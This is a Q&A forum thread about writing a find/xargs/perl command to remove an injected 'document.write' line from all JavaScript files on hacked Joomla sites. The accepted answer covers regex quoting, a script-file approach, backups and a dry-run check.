Which characters to escape in find command

Question

The following malicious line was injected at the end of all js files on all my Joomla installations on my shared host account:

;document.write('');

I want to remove it at once from all files using the following SSH command (which should have some errors):

find ./ -name "*.js" -type f | xargs perl -pi -e 's/;document.write$\'\</pre>

<p>The problem is since a backslash has to be used to escape some characters, I don't know if I'm using it correctly and what else should be escaped.</p>

<p>Needless to say, that command is not working.</p>

<p>Any ideas?</p>

<p>Thanks!!</p>

Jonathan Leffler · Accepted Answer

Use the Perl \Q...\E notation to suspend the metacharacters. However, since there's such a mess of characters in the string to be matched that are also special to the shell, I'd place the Perl regex into a file (script.pl), using % (which doesn't appear in the string to be replaced) as the regex delimiter:

s%\Q;document.write('');\E%%g;

And then run it with:

find ./ -name "*.js" -type f | xargs perl -pi.bak -f script.pl

If you spend enough time, you probably can find a way to make it work without the script file; it probably isn't worth the effort, though (especially since I'm sure you asked something very similar to this several days ago).

Obviously, before running this to edit the files, you'll run a variant to ensure that the sought after lines are printed:

script2.pl:

print if m%\Q;document.write('');\E%;

run using:

find ./ -name "*.js" -type f | xargs perl -n -f script2.pl

If this doesn't detect the lines, then you track down a variation until you can find something that does match. You might decide to use something like:

print if m%;document.write.''.;%;

This replaces the two parentheses with . (so, in theory, it might match something else, but in practice, it won't).

Which characters to escape in find command

Answers (1)

Related Questions